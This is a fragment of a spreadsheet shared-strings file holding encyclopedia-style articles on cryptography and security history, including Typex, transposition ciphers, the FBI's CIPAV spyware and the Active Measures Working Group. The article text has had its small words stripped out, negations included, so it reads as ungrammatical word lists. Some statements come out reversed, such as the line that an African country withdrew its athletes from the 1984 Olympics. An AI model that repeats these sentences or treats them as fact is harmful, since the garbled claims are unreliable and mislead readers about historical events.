    <t>Cryptologia</t>
  </si>
  <si>
    <t>cryptologia journal cryptography published times year since january 1977. remit aspects cryptography, special emphasis historical aspects subject. founding editors brian winkel, david kahn, louis kruh, cipher deavours greg mellen. current editor-in-chief craig bauer. journal initially published rose-hulman institute technology. july 1995, moved united states military academy, published taylor francis since january 2006 issue (volume number also journal cryptology cryptogram cryptology eprint archive references external links cryptologia home page</t>
  </si>
  <si>
    <t>Cryptoperiod</t>
  </si>
  <si>
    <t>cryptoperiod time span specific cryptographic authorized use. common government guidelines range years asymmetric cryptography, days symmetric cipher traffic keys.factors consider include strength underlying encryption algorithm, length, likelihood compromise security breach availability mechanisms revoking keys. traditional cryptographic practice, keys changed regular intervals, typically time day. code word change, parlance, hotel juliet nato phonetic alphabet.when cryptographic devices began used large scale, update specific time synchronize re-key. this accomplished hour julian date changed, among crypto-accountants, managers users jargon "hj" became accepted term meaning time change crypto-key. nestor vietnam during vietnam war, united states issued forces series secure voice encryption equipment code-named nestor. according u.s. army history: maintain compatibility, changes occur simultaneously units. time chosen change midnight, tactically worst possible time greatest number enemy contacts occurred 2200 0200. moreover, several units shared keying device, move night change settings inconvenient dangerous added reasons using equipment. later time daily nestor change moved 0600." references conduct unbecoming, randy shilts, macmillan, 2005, 117, describes change procedure</t>
  </si>
  <si>
    <t>Composite Blocking List</t>
  </si>
  <si>
    <t>computer networking, composite blocking list (cbl) dns-based blackhole list suspected e-mail spam sending computer infections. overview takes source data large spamtraps/mail infrastructures, lists exhibiting characteristics open proxies various sorts (http, socks, analogx, wingate etc.) worms/viruses/botnets direct mail transmission, otherwise participating botnet. trojan horse "stealth" spamware.the attempts avoid listing real mail servers, certain misconfigurations mail servers make system appear infected (for example, servers send helo 'localhost' similar incorrect domain.) entries automatically expire period time. provide public access gathered evidence. data used spamhaus list. also comparison blacklists index estimate outgoing spam reputation external links lookup removal page</t>
  </si>
  <si>
    <t>UIC franc</t>
  </si>
  <si>
    <t>franc (code: xfu) virtual currency unit used international union railways (uic). introduced 1976 gold franc abandoned purpose instability international monetary system, replaced european currency unit january 1990.the code withdrawn iso-4217 currency list 2013, despite franc long fallen use. also private currency neutral unit construction (nuc) related currency airline ticketing industry references external links international union railways</t>
  </si>
  <si>
    <t>Typex</t>
  </si>
  <si>
    <t>history cryptography, typex (alternatively, type typex) machines british cipher machines used 1937. adaptation commercial german enigma number enhancements greatly increased security. cipher machine (and many revisions) used mid-1950s modern military encryption systems came use. description like enigma, typex rotor machine. typex came number variations, contained five rotors, opposed three four enigma. like enigma, signal sent rotors twice, using "reflector" rotor stack. typex rotor, electrical contact doubled improve reliability. five rotors, typically first stationary. these provided additional enciphering without adding complexity rotor turning mechanisms. their purpose similar plugboard enigmas, offering additional randomization could easily changed. unlike enigma's plugboard, however, wiring rotors could easily changed day-to-day. plugboards added later versions typex. major improvement typex standard enigma rotors machine contained multiple notches would turn neighbouring rotor. this eliminated entire class attacks system, whereas enigma's fixed notches resulted certain patterns appearing cyphertext could seen certain circumstances. some typex rotors came parts, slug containing wiring inserted metal casing. different casings contained different numbers notches around rim, notches. each slug could inserted casing different ways turning over. use, rotors machine would casings number notches. normally five slugs chosen ten. models, operators could achieve speed words minute, output ciphertext plaintext printed paper tape. portable versions, mark iii, message typed left hand right hand turned handle.several internet typex articles vaseline used lubricate typex machines lubricant used. vaseline used lubricate rotor disc contacts. without risk arcing would burn insulation contacts. rest machine grades (spindle oils used. regular cleaning maintenance essential. particular, letters/figures cam-cluster balata discs kept lubricated. history development 1920s, british government seeking replacement book cipher systems, shown insecure proved slow awkward use. 1926, inter-departmental committee formed consider whether could replaced cipher machines. over period several years large expense, committee investigated number options proposal decided upon. suggestion forward wing commander oswyn lywood adapt commercial enigma adding printing unit committee decided pursuing lywood's proposal. august 1934, lywood began work machine authorised raf. lywood worked coulson, albert lemmon, ernest smith kidbrooke greenwich, printing unit provided creed company. first prototype delivered ministry april 1935. early 1937, around typex mark machines supplied raf. machine initially termed "raf enigma type attachments". design successor begun february 1937. june 1938, typex mark demonstrated cipher-machine committee, approved order machines. mark model bulky, incorporating printers: plaintext ciphertext. result, significantly larger enigma, weighing around measuring (760 (560 (360 mm). after trials, machine adopted raf, army government departments. during world large number typex machines manufactured tabulating machine manufacturer powers-samas.typex mark portable variant, using drums mark machines powered turning handle also possible attach motor drive). maximum operating speed around letters minute, significantly slower achievable mark typex mark another handle-operated variant, measuring (510 (300 (230 mm), weighing consisting components. plugboards reflector added machine november 1941. inter-allied communications world combined cipher machine (ccm) developed, used royal navy november 1943. implemented making modifications typex united states mark machine would compatible. typex mark viii mark fitted morse perforator. typex (bid/08/2) typex (bid/08/3) late models, incorporated plugboards improved security. mark mark modified ccm. zealand, typex mark mark superseded mark mark january 1950. royal; force used combination creed teleprinter typex 1960. this amalgamation allowed single operator punch tape printouts sending receiving encrypted material. erskine (2002) estimates around 12,000 typex machines built world security less year war, germans could read british military encryption typex, used british armed forces commonwealth countries including australia, canada zealand. royal navy decided adopt type mark 1940 trials; eight stations already type machines. eventually machines would required. zealand initially machines cost £115 (gbp) auckland wellington.from 1943 americans british agreed upon combined cipher machine (ccm). british typex american mark could adapted become interoperable. while british showed typex americans, americans never permitted british ecm, complex design. instead, attachments built allowed read messages created other. 1944 admiralty decided supply mark machines (the typex mark adaptors american ccm) "major" vessel including corvettes submarines; rnzn vessels achilles, arabis (then action), arbutus, gambia matua.although british test cryptanalytic attack made considerable progress, results significant enigma, increased complexity system levels traffic. typex machine without rotors captured german forces dunkirk battle france german cryptanalytic section proposed attempting crack typex; however, b-dienst codebreaking organisation gave weeks, time personnel attempts refused.one german cryptanalyst stated typex secure enigma since seven rotors, therefore major effort made crack typex messages believed even enigma's messages unbreakable.although typex attributed good security, historic record much less clear. there ongoing investigation typex security arose german pows north africa claiming typex traffic decipherable. brief excerpt report typex machines continued long world zealand military used typex machines early 1970s, disposing last machine 1973. advantages enigma versions typex advantages german military versions enigma machine. german equivalent teleprinter machines world (used higher-level field units) lorenz 40/42 siemens halske using fish cyphers. most versions enigma required operators operate effectively—one operator input text enigma copy enciphered deciphered characters—typex required operator. typex avoided operator copying errors, enciphered deciphered text automatically printed paper tape. unlike enigma, typex machines linked teleprinters typex machines could required. enigma messages written, enciphered, transmitted morse), received, deciphered, written again, typex messages typed automatically enciphered transmitted step, reverse also true. also cryptanalysis enigma cryptanalysis lorenz cipher mercury (typex mark x)—a typex descendant used on-line traffic. notes references martin campbell-kelly, icl: business technical history, oxford university press, 1990. dorothy clarkson, "cypher machines: maintenance restoration spanning sixty years", cryptologia, 27(3), july 2003, 209–212. cipher deavours louis kruh, "machine cryptography modern cryptanalysis", artech house, 1985, 144–145; 148–150. ralph erskine, "the admiralty cipher machines during second world war: stupid all". journal intelligence history 2(2) (winter 2002). ralph erskine, "the development typex", enigma bulletin (1997): 69–86 kruh deavours, "the typex cryptograph" cryptologia 7(2), 145–167, 1983 eric morgon, "the history communications security zealand", part (pdf).possibly related page html external links series photographs typex jerry proc's page typex typex graphical simulator microsoft windows virtual typex online simulator crypto museum page typex</t>
  </si>
  <si>
    <t>Computer and Internet Protocol Address Verifier</t>
  </si>
  <si>
    <t>computer internet protocol address verifier (cipav) data gathering tool federal bureau investigation (fbi) uses track gather location data suspects electronic surveillance. software operates target computer much like forms spyware, whereas unknown operator software installed monitoring reporting activities.the cipav captures location-related information, address, address, open ports, running programs, operating system installed application registration version information, default browser, last visited url.once initial inventory conducted, cipav slips background silently monitors outbound communication, logging every address computer connects, time date stamping each.the cipav made headlines july, 2007, exposed open court investigation teen made bomb threats timberline high school washington state.the also sought approval foreign intelligence surveillance court cipav terrorism spying investigations. also backdoor (computing) carnivore (software) echelon finfisher magic lantern (software) minipanzer megapanzer network investigative technique policeware r2d2 (trojan) tailored access operations wiretapping references external links http://blog.wired.com/27bstroke6/2009/04/fbi-spyware-pro.html https://web.archive.org/web/20090422204155/http://www.computerworld.com/action/article.do?command=viewarticlebasic&amp;articleid=9131778&amp;source=nlt_am https://www.eff.org/deeplinks/2011/04/new-fbi-documents-show-depth-government http://www.infosecurity-magazine.com/view/33825/did-the-fbi-use-cipav-against-tor/</t>
  </si>
  <si>
    <t>Cryptomenysis Patefacta</t>
  </si>
  <si>
    <t>cryptomenysis patefacta, secret information disclosed without 1685 non-fiction book written john falconer, second text written english topic cryptography. 1693 republished rules explaining deciphering manner secret writing.the book serves guide various cyphers including egyptian hieroglyphs fingerspelling. references</t>
  </si>
  <si>
    <t>Acid Cryptofiler</t>
  </si>
  <si>
    <t>acid cryptofiler cryptographic software program designed department "control information" (centre d’electronique l’armement) french general directorate armament (direction générale l'armement). online storage service. software manufactured acid technologies (france). history acid cryptofiler list cryptographic software approved usage european union north atlantic treaty organisation, known used organizations well european parliament european commission since summer 2011. approved usage version september 2011.in january 2013, october campaign discovered, researchers noted malware particularly targeted documents .acid extensions, referring documents processed acid cryptofiler, including file extensions acidcsa, acidsca, aciddsk, acidpvr, acidppr, acidssa. overview acid cryptofiler based integration government cryptographic libraries, including ccsd (ccsd means "defense security cryptographic layers"). offers following functions: asymmetric encryption (cf. public-key cryptography) archive format (multi-file, multi-recipient) called acid archives. volume encryption (containers) symmetric mode asymmetric mode.acid cryptofiler delivered directory function file public keys, compliant ldap active directory. bunch file contains public keys held user. user belong different cryptographic domains domain ccsd library cryptographic parameters). private keys also stored bunch file. keys generated centralized office responsibility chief information security officer. before user given pair keys), he/she must trusted centralized office. france, acid cryptofiler defense classified information.acid cryptofiler designed developed military engineers direction générale l'armement. delivered since 1999 (version 7).. runs microsoft windows. software classified.according book gérald bronner, acid cryptofiler slow sending email took minutes. references</t>
  </si>
  <si>
    <t>Active Measures Working Group</t>
  </si>
  <si>
    <t>interagency active measures working group group united states department state later united states information agency (usia). group formed early reagan administration, 1981, effort counter aggressive soviet disinformation. representatives cia, fbi, department defense, arms control disarmament agency, defense intelligence agency, department justice, united states information agency among government agencies served group. deputy assistant secretary state, dennis kux, group's first chairman served january, 1984. three individuals succeeded brief stints: william knepper, thorne, lucian heichler. 1985, deputy assistant secretary state kathleen bailey appointed chair group served departure late 1987. in-depth report national defense university analyzed history effectiveness working group. although primary focus group's activities countering soviet disinformation, also reported front groups soviet active measures. active measures working group developed approach expanded u.s. government's monitoring soviet disinformation activity conducted exclusively interagency counter-disinformation effort. background early days cold war, tracked soviet disinformation forgeries, periodically attempted expose them. during 1970s u.s. chose fight back soviet active measures reasons. first policy makers want "unnecessary confrontation" sidetrack progress important issues strategic arms control. second reason disgrace cia. during vietnam war, johnson ordered monitor certain american citizens, notably black power antiwar movements, feared supported infiltrated foreign communists. eventually similar monitoring programs revealed public, prompting major public contention major reforms cia. particularly damaged senate (church committee) house (pike committee) intelligence committees, little respond anti-american disinformation.in october 1979 stanislav levchenko, head active measures line rezidentura tokyo, contacted american officials granted political asylum united states. levchenko explained workings soviet apparatus carried out, direction, japan. levchenko's information, combined ladislav bittman, deputy head czechoslovakian intelligence service's disinformation department, instrumental helping understand many operations carried united states. this information also reported policy makers congress. under reagan administration, united states began openly challenging soviet disinformation active measures.the formation interagency active measures working group encouraged william casey, director cia, high level state department support lawrence eagleburger, input john lenczowski national security council. interagency cooperation interagency active measures working group combined information gathered usia international posts, reporting, investigations. when information arrived, analyzed working group analysts disinformation experts. group made cia's computerized database forgeries, and, cia, unfettered access defectors involved active measures. group instructed usia overseas offices report disinformation encountered. group also used usia state department distribute publications domestically abroad journalists, government employees, u.s. embassy staff abroad, foreign government representatives staff. active measures working group used outlet expert knowledge within government bureaucracy. example, group initially published report david hertzberg, young analyst started career state years earlier still undergraduate george washington university. hertzberg noticed trend increased illegal activity odds image soviet union trying project: soviets expanding espionage activities, particularly attempts steal military technology defense industry proprietary information, corresponded increase number soviet agents expelled countries espionage. hertzberg's report sanitized, published february 1982 state department's imprimatur "informal research study background information" eventually converted foreign affairs note entitled, "expulsion soviet representatives foreign countries, 1970–81." (the complete collection foreign affairs notes viewed downloaded here. document generated news coverage commentary expansion soviet spying directly cited least major publications. methodology 1981 through early 1985 report-analyze-publicize active measures working group developed methodology named report-analyze-publicize rap). group's first counter-disinformation effort soviet union took form report, "state department special report soviet active measures: forgery, disinformation, political operations" october 1981. document four-page overview soviet active measures techniques included soviet disinformation themes past examples. 14,000 copies report distributed news organizations, federal agencies, etc. addition special reports, group published series state department foreign affairs notes usia distributed journalists, academics, interested persons abroad. important publication distributed group house intelligence committee hearing soviet active measures showed foreign audiences congressional support exposing soviet disinformation. group also held press conferences expose soviet forgeries distributed copies fake documents attending journalists. "truth squads" members active measures working group gave presentations describing soviet disinformation activities, pointing falsehoods common themes tell-tale signs forgery. these presentations often held internationally; "squads" visited countries. group averaged presentations countries week visited nato headquarters annually meetings soviet active measures. these visits also geared toward gathering information foreign governments soviet active measures campaigns conducted respective countries. dennis commented success presentations: "the fact made credible presentation, ideological show lent certain amount professionalism whole effort." important cases 1984 summer olympics attempt seek revenge carter's boycott moscow summer olympics 1980, manufactured public relations crisis forging letters klux klan threatened athletes african countries mailed washington, countries' olympic committees. grammatical errors letters suggested originally drafted russian, could provide certain conclusion. then, source participated production letters confirmed origin kgb. active measures working group reported conclusively letters soviet forgeries, allowed usia state department reassure targeted african countries. result, african country withdrew athletes 1984 angeles olympics. methodology 1985 1987 1985, newt gingrich, congressional representative state georgia, sponsored amendment promoting permanent office department state "soviet communist disinformation press manipulation" better inform american public issues. gingrich also added amendment unrelated legislation stipulating state department must produce public report soviet active measures. responsibility report assigned within state department bureau intelligence research (inr), headed ambassador morton abramowitz. abramowitz charged kathleen bailey responsibility report named chair working group. although bailey supported continuation foreign affairs notes group product, first decisions change group's focus single-author, short publications multi-agency drafted compendiums in-depth analyses, "gingrich report" first. this report, report substance process anti-us disinformation propaganda campaigns," published august 1986. second major report, entitled report active measures propaganda, 1986–1987" published august 1987. this report, well foreign affairs note published month before, focused soviet disinformation campaign seeking attribute aids virus u.s. government. october 1987, mikhail gorbachev waved copy report u.s. secretary state george shultz, complaining publishing information undermined relations countries. gorbachev insisted report contained "shocking revelations" amounted "nourishing hatred" soviet union. operation infektion active measures working group's policy exposing soviet disinformation helped discredit soviet disinformation campaign, operation infektion, accused united states deliberately creating aids virus government laboratory spreading state department held press conference video here) release report, copy cover pravda cartoon accused u.s. creating virus. impact 1987 report continued reverberate recently component york times documentary operation infektion. other cases soviet disinformation 1980s soviets forged memorandum president united states secretaries state defense director cia, ordered establishment u.s. military force called "permanent peace forces" would used intervene latin america. this forgery inflamed nationalist anti-american sentiment latin america. soviets circulated false allegations united states importing latin american children body parts organ transplants. 1982, soviets forged transcript speech made united nations ambassador jeane kirkpatrick called balkanization india planted indian press. soviets forged policy paper outlines global u.s. political military foreign policy 1985 1988. central theme paper purported u.s. goal "strategic dominion" soviet union. forgery included underlying goals integration swiss, austrian, swedish national resources nato "neutralization" discussions concerning nuclear-free zones. soviets forged letter usia senator durenberger 1986 outlines purported usia plan disseminate rumors events soviet union wake accident chernobyl nuclear power plant exaggerated reports number victims. religious organizations used front organizations: anti-zionist committee, christian peace conference, world council churches, asian buddhist council peace. world peace council largest soviet front organization world working group products publications interagency active measures working group primary categories written products. first comprised short special reports foreign affairs notes, ranged page maximum pages length. analyst david hertzberg authored foreign affairs notes; moved career left soviet account, foreign affairs notes published state department. complete collection foreign affairs notes viewed downloaded online. this category also included speeches articles drafted presentation u.s. officials. second category reports lengthy (many tens pages), in-depth, interagency-drafted documents. special reports foreign affairs notes 1981 soviet active measures: forgery, disinformation, political operations. special report october 1981. 1982 expulsion soviet representatives foreign countries, 1970–81. foreign affairs note. february 1982. world peace council: instrument soviet foreign policy. foreign affairs note. april 1982. religion u.s.s.r.: laws, policy, propaganda. foreign affairs note. 1982. soviet active measures: update. special report 101. july 1982. moscow's radio peace progress. foreign affairs note. august 1982. communist clandestine broadcasting. foreign affairs note. december 1982. 1983 lawrence eagleburger. "unacceptable intervention: soviet active measures." nato review (april 1983), 6–11. expulsions soviet officials worldwide, 1982. foreign affairs note. january 1983. soviet active measures: focus forgeries. foreign affairs note. april 1983. world peace council's "peace assemblies." foreign affairs note. 1983. lawrence eagleburger. "unacceptable intervention: soviet active measures." department state bulletin #2077, august 1983, 45–49. reprinted nato review (1983). world federation trade unions: soviet foreign policy tool. foreign affairs note. august 1983. soviet active measures. special report 110. september 1983. 1984 expulsions soviets worldwide, 1983. foreign affairs note. january 1984. "soviet active measures." address william knepper, deputy assistant secretary, bureau intelligence research, chicago council foreign relations, current policy, (may 1984). soviet fronts: women youth. foreign affairs note. july 1984. 1985 expulsions soviets worldwide, 1984. foreign affairs note. january 1985. soviet active measures: world peace council. foreign affairs note. april 1985. soviet active measures: christian peace conference. foreign affairs note. 1985. soviet active measures: 12th world youth festival moscow. foreign affairs note. june 1985. contemporary soviet propaganda disinformation: conference report. june 1985. "soviet active measures." address william casey, director central intelligence agency, dallas council world affairs. current policy, (september 1985). update: 12th world youth festival moscow. foreign affairs note. december 1985. 1986 expulsions soviets worldwide, 1985. foreign affairs note. january 1986. recent anti-american forgeries. foreign affairs note. november 1986. 1987 expulsion soviet officials, 1986. foreign affairs note. january 1987. moscow peace movement: soviet committee defense peace. foreign affairs note. 1987. recent anti-american forgeries: update. foreign affairs note. july 1987. u.s.s.r.'s aids disinformation campaign. foreign affairs note. july 1987. 1988 expulsions soviet officials, 1987. foreign affairs note. january 1988. major interagency publications u.s. department state, active measures: report substance process anti-u.s. disinformation propaganda campaigns. august 1986. u.s. department state, soviet influence activities: report active measures propaganda, 1986–1987 august 1987. u.s. department state, "disinformation, media, foreign policy." conference report. 1987. u.s. information agency, soviet active measures glasnost. march 1988 u.s. department state, soviet influence activities: report active measures propaganda, 1987–1988 august, 1989. abolition support group began deteriorate late 1980s soviet disinformation seemed less threat light gorbachev's glasnost soviets' promise cease disinformation operations. group's mission counter soviet disinformation lost pertinence upon disintegration soviet union, along bureaucratic interest group's efforts. quality group's membership declined cia's fbi's longest serving group members distanced began sending younger, less experienced participants place. furthermore, many reagan appointees supported working group left aftermath iran-contra scandal. counter disinformation effort shifted usia's office counter soviet disinformation headed charles wick included herbert romerstein todd leventhal. active measures working group's final report, "soviet active measures 'post-cold war' 1988–1991," came june 1992 written todd leventhal auspices usia. time publication, soviet union longer existed, report warned even though soviet union collapsed, active measures still threat u.s. interests number anti-american groups countries adopting expanding active measures: long states groups interested manipulating world opinion, limiting u.s. government actions, generating opposition u.s. policies interests continue techniques, need united states information agency systematically monitor, analyze, counter them." lessons learned responding disinformation, united states tremendous advantage truth inherently powerful lies. lies unchallenged, damaging effect." —charles wick, 1988 simply exposing acts disinformation extremely powerful tool undermining efficacy. effective strategic communication necessitates interagency collaboration ability pull together diverse expertise multiple organizations. legacy june 2020, michael mccaul announced would introduce legislation recreate modern version active measure working group combat chinese communist party propaganda disinformation. also references further reading soviet active measures 'post-cold war' era, 1988–1991. u.s. information agency, june 1992. boghart, thomas. "operation infektion: soviet bloc intelligence aids disinformation campaign." studies intelligence, vol. december 2009. soviet influence activities: report active measures propaganda, 1986–1987. united states department state, august 1987. kux, dennis. soviet active measures disinformation: overview assessment. 1985. daugherty, william executive secrets: covert action presidency. university press kentucky, 2004. isbn 0813191610 isbn 978-0813191614. jones, ishmael. human factor: inside cia's dysfunctional intelligence culture. york: encounter books, 2010. isbn 978-1594032233. bittman, ladislav. soviet disinformation: insider's view. 1985. bittman, ladislav. deception game. 1981. isbn 9780345298089. bailey, norman strategic plan cold war: national security decision directive 1998. fischer, benjamin cold conundrum: 1983 soviet scare." cia, center study intelligence. cull, nicholas cold united states information agency: american propaganda public diplomacy, 1945–1989. 2009. isbn 0521142830.</t>
  </si>
  <si>
    <t>Transposition cipher</t>
  </si>
  <si>
    <t>cryptography, transposition cipher method encryption scrambles positions characters (transposition) without changing characters themselves. transposition ciphers reorder units plaintext (typically characters groups characters) according regular system produce ciphertext permutation plaintext. they differ substitution ciphers, change position units plaintext instead change units themselves. despite difference transposition substitution operations, often combined, historical ciphers like adfgvx cipher complex high-quality encryption methods like modern advanced encryption standard (aes). general principle plaintexts rearranged ciphertext using key, scrambling order characters like shuffled pieces jigsaw puzzle. resulting message hard decipher without many ways characters arranged. example, plaintext "this wikipedia" could encrypted "twdip sihii ikase". decipher encrypted message without key, attacker could guess possible words phrases like diathesis, dissipate, width, etc., would take time reconstruct plaintext many combinations letters words. contrast, someone could reconstruct message easily: sequence (key letters alphabetical order) plaintext ciphertext column: twd, hii, ika, ciphertext groups readability: twdip sihii ikase practice, message short predictable keyword would broken almost immediately cryptanalysis techniques. transposition ciphers several vulnerabilities (see section "detection cryptanalysis" below), small mistakes encipherment process render entire ciphertext meaningless. however, given right conditions long messages (e.g., 100–200 letters), unpredictable contents, unique keys message, strong transposition methods, guessing right words could computationally impossible without information. book codebreaking historical ciphers, elonka dunin klaus schmeh describe double columnar transposition (see below) "one best manual ciphers known". rail fence cipher rail fence cipher form transposition cipher gets name encoded. rail fence cipher, plaintext written downwards diagonally successive "rails" imaginary fence, moving bottom. message read rows. example, using three "rails" message discovered flee once', cipherer writes out: then reads off: wecrl teerd soeef eaoca ivden (the cipher broken ciphertext blocks five help avoid errors. this common technique used make cipher easily readable. spacing related spaces plaintext carry information plaintext.) scytale rail fence cipher follows pattern similar scytale, (pronounced "skit-uhl-ee") mechanical system producing transposition cipher used ancient greeks. system consisted cylinder ribbon wrapped around cylinder. message encrypted written coiled ribbon. letters original message would rearranged ribbon uncoiled cylinder. however, message easily decrypted ribbon recoiled cylinder diameter encrypting cylinder. using example before, cylinder radius three letters around circumference, cipherer writes out: example, cylinder running horizontally ribbon wrapped around vertically. hence, cipherer reads off: woeev eaear rteeo ddnif cslec route cipher route cipher, plaintext first written grid given dimensions, read pattern given key. example, using plaintext used rail fence: might specify "spiral inwards, clockwise, starting right". that would give cipher text ejxctedec daewriorf eonalevse route ciphers many keys rail fence. fact, messages reasonable length, number possible keys potentially great enumerated even modern machinery. however, keys equally good. badly chosen routes leave excessive chunks plaintext, text simply reversed, give cryptanalysts clue routes. variation route cipher union route cipher, used union forces american civil war. this worked much like ordinary route cipher, transposed whole words instead individual letters. because would leave certain highly sensitive words exposed, words would first concealed code. cipher clerk also entire null words, often chosen make ciphertext humorous. columnar transposition columnar transposition, message written rows fixed length, read column column, columns chosen scrambled order. both width rows permutation columns usually defined keyword. example, keyword zebras length rows length permutation defined alphabetical order letters keyword. case, order would regular columnar transposition cipher, spare spaces filled nulls; irregular columnar transposition cipher, spaces left blank. finally, message read columns, order specified keyword. example, suppose keyword zebras message discovered. flee once. regular columnar transposition, write grid follows: providing five nulls (qkjeu), letters randomly selected fill incomplete columns part message. ciphertext read evlne acdtk eseaq rofoj deecu wiree irregular case, columns completed nulls: this results following ciphertext: evlna cdtes earof odeec wiree decipher recipient work column lengths dividing message length length. then write message columns again, re-order columns reforming word. variation, message blocked segments length long segment permutation (given key) applied. this equivalent columnar transposition read-out rows instead columns. columnar transposition continued used serious purposes component complex ciphers least 1950s. double transposition single columnar transposition could attacked guessing possible column lengths, writing message columns (but wrong order, known), looking possible anagrams. thus make stronger, double transposition often used. this simply columnar transposition applied twice. used transpositions, different keys used. example, take result irregular columnar transposition previous section, perform second encryption different keyword, stripe, gives permutation "564231": before, read columnwise give ciphertext: caeen soiae drlef wedre evtoc multiple messages exactly length encrypted using keys, anagrammed simultaneously. this lead recovery messages, recovery keys every message sent keys read). during world german military used double columnar transposition cipher, changing keys infrequently. system regularly solved french, naming übchi, typically able quickly find keys they'd intercepted number messages length, generally took days. however, french success became widely known and, publication matin, germans changed system november 1914.during world double transposition cipher used dutch resistance groups, french maquis british special operations executive (soe), charge managing underground activities europe. also used agents american office strategic services emergency cipher german army navy. until invention cipher, double transposition generally regarded complicated cipher agent could operate reliably difficult field conditions. cryptanalysis double transposition cipher treated single transposition long product lengths keys.in late 2013, double transposition challenge, regarded author undecipherable, solved george lasry using divide-and-conquer approach transposition attacked individually. myszkowski transposition variant form columnar transposition, proposed émile victor théodore myszkowski 1902, requires keyword recurrent letters. usual practice, subsequent occurrences keyword letter treated next letter alphabetical order, e.g., keyword tomato yields numeric keystring "532164." myszkowski transposition, recurrent keyword letters numbered identically, tomato yielding keystring "432143." plaintext columns unique numbers transcribed downward; recurring numbers transcribed left right: rofoa cdted seeea cweiv rlene disrupted transposition disrupted transposition cipher complicates transposition pattern irregular filling rows matrix, i.e. spaces intentionally left blank blackened like rasterschlüssel 44), filled later either another part plaintext random letters. comb approach possible algorithm start whenever plaintext reaches password character. example, blanks no.: columns taken regular columnar transposition: tprpn, kisaa, chait, nbert, emato, etc. numerical sequence approach another simple option would password places blanks according number sequence. e.g. "secret" would decoded sequence "5,2,1,4,3,6" cross field matrix, count cross second field, etc. following example would matrix columnar transposition columnar "crypto" filled crossed fields according disruption "secret" (marked asterisk), whereafter message discovered, flee once" placed leftover spaces. resulting ciphertext (the columns read according transposition key) "wceeo eret rivfc eodn sele ada". grilles another form transposition cipher uses grilles, physical masks cut-outs. this produce highly irregular transposition period specified size grille, requires correspondents keep physical secret. grilles first proposed 1550, still military first months world one. detection cryptanalysis since transposition affect frequency individual symbols, simple transposition easily detected cryptanalyst frequency count. ciphertext exhibits frequency distribution similar plaintext, likely transposition. general, transposition methods vulnerable anagramming—sliding pieces ciphertext around, looking sections look like anagrams words english whatever language plaintext written solving anagrams. once anagrams found, reveal information transposition pattern, consequently extended. simpler transpositions often suffer property keys close correct reveal long sections legible plaintext interspersed gibberish. consequently, ciphers vulnerable optimum seeking algorithms genetic algorithms hill-climbing algorithms.there several specific methods attacking messages encoded using transposition cipher. these include: known-plaintext attack: using known guessed parts plaintext (e.g. names, places, dates, numbers, phrases) assist reverse-engineering likely order columns used carry transposition and/or likely topic plaintext. brute-force attack: keys derived dictionary words phrases books publicly available sources, possible brute-force solution attempting billions possible words, word combinations, phrases keys. depth attack: messages length encoded keys, messages aligned anagrammed messages show meaningful text places, without needing know transposition steps taken place. statistical attack: statistics frequency 2-letter, 3-letter, etc. combinations language used inform scoring function algorithm gradually reverses possible transpositions based changes would produce likely combinations. example, 2-letter pair common english text, cryptanalyst attempt transpositions place together.a detailed description cryptanalysis german transposition cipher found chapter herbert yardley's "the american black chamber." cipher used zodiac killer, called "z-340", organized triangular sections substitution different symbols letters diagonal "knight move" transposition, remained unsolved years, international team private citizens cracked december 2020, using specialized software. combinations transposition often combined techniques evaluation methods. example, simple substitution cipher combined columnar transposition avoids weakness both. replacing high frequency ciphertext symbols high frequency plaintext letters reveal chunks plaintext transposition. anagramming transposition work substitution. technique particularly powerful combined fractionation (see below). disadvantage ciphers considerably laborious error prone simpler ciphers. fractionation transposition particularly effective employed fractionation preliminary stage divides plaintext symbol ciphertext symbols. example, plaintext alphabet could written grid, every letter message replaced co-ordinates (see polybius square straddling checkerboard). another method fractionation simply convert message morse code, symbol spaces well dots dashes.when fractionated message transposed, components individual letters become widely separated message, thus achieving claude shannon's diffusion. examples ciphers combine fractionation transposition include bifid cipher, trifid cipher, adfgvx cipher cipher. another choice would replace letter binary representation, transpose that, convert binary string corresponding ascii characters. looping scrambling process binary string multiple times changing ascii characters would likely make harder break. many modern block ciphers complex forms transposition related simple idea. also substitution cipher (unit) topics cryptography notes references kahn, david. codebreakers: story secret writing. sub. scribner, 1996. yardley, herbert. american black chamber. bobbs-merrill, 1931.</t>
  </si>
  <si>
    <t>Additional Protocol to the Convention on Cybercrime</t>
  </si>
  <si>
    <t>additional protocol convention cybercrime, concerning criminalisation acts racist xenophobic nature committed computer systems additional protocol council europe convention cybercrime. this additional protocol subject negotiations late 2001 early 2002. final text protocol adopted council europe committee ministers november 2002 title "additional protocol convention cybercrime, concerning criminalisation acts racist xenophobic nature committed computer systems, ("protocol"). protocol opened january 2003 entry force march 2006. july 2017, states ratified protocol signed protocol followed ratification.the protocol requires participating states criminalize dissemination racist xenophobic material computer systems, well racist xenophobic-motivated threats insults. article section protocol specifically covers denial holocaust genocides recognized international courts since 1945 relevant international legal instruments. section article allows party protocol discretion prosecute offense committed intent incite hatred, discrimination violence; make reservation, allowing party apply whole part article 6.the council europe explanatory report protocol states "european court human rights made clear denial revision 'clearly established historical facts holocaust would removed protection article article echr (see context lehideux isorni judgment september 1998)".two english speaking states europe, ireland united kingdom, signed additional protocol, (the third, malta, signed january 2003, ratified it). july 2005 canada became first non-european state sign convention. united states government believe final version protocol consistent united states' constitutional guarantees informed council europe united states become party protocol. references</t>
  </si>
  <si>
    <t>Transshipment (information security)</t>
  </si>
  <si>
    <t>information security, transshipment technique protecting software services applications ensuring receive data known able handle safely. term analogous logistics industry cargo offloaded means transport another port entry. with transshipment, information extracted data used send encoded data handled safely. method with transshipment, messages intercepted business information carry extracted. this information encoded message using data format receiving application safely handle. example example, email client known handle messages simple structure without failure full generality allowed standards. transshipment used protect mail client attackers exploit weaknesses ability handle general case. transshipment process extracts business information email messages creates message conveys information using simple structures. mail client protected without knowing details weaknesses implementation. implementation transshipment function must handle data sent potential attackers. useful function must implemented without vulnerable attack. this achieved using guard technology separates implementation three parts destination proxy interacts message originator extracts business information messages, verifier source proxy creates message carry business information interacts message recipient. verifier's role ensure source proxy presented business information using simple data format expecting. result, attack surface limited verifier's interface part source proxy's interface visible verifier. advantages unlike antivirus software transshipment defends unknown attacks, hence zero-day attacks, require routine updates signatures heuristics. references</t>
  </si>
  <si>
    <t>Acknowledgement (data networks)</t>
  </si>
  <si>
